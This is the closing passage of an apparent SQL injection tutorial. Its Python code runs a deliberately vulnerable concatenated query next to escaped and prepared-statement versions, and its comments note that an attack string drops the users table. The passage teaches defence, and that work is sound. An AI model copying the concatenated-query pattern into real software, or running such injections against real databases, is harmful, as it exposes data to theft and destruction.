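    """Prepared statement: SQL text and value travel separately."""
    return conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,)).fetchall()


def outcome_concat(name):
    """Run the vulnerable lookup on a fresh database and report
    (rows, users table still exists, error message or None)."""
    conn = fresh_db()
    try:
        rows = lookup_concat(conn, name)
    except sqlite3.OperationalError as exc:      # malformed SQL, e.g. Mc'Donalds
        return None, users_table_exists(conn), str(exc)
    return rows, users_table_exists(conn), None


if __name__ == "__main__":
    for name in ("Alex", "Mc'Donalds", ATTACK):
        print(repr(name), "->", outcome_concat(name))
    # Alex        -> a row with the phone number, table intact
    # Mc'Donalds  -> no rows, table intact, a syntax error from the database
    # the attack  -> no rows, no error, and the users table is gone
    for fn in (lookup_escaped, lookup_param):
        assert fn(fresh_db(), "Mc'Donalds") == [("222",)]
        assert fn(fresh_db(), ATTACK) == []     # searched for literally, nothing found
```

Both fixes turn the attack string into an ordinary, unsuccessful search; the difference is that lookup_escaped has to know the database's quoting rules and the quotes around the value, while lookup_param needs neither.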





That is about all there is to it. Text is text. Whenever you put one text (data) into another text that has rules (a language), you have to take those rules into account and escape what needs escaping, or keep the two apart, as prepared statements do. Do that everywhere texts meet, every single time, and SQL injection (and its HTML cousin, XSS) will not be your problem.


Source: https://habr.com/ru/post/182424/


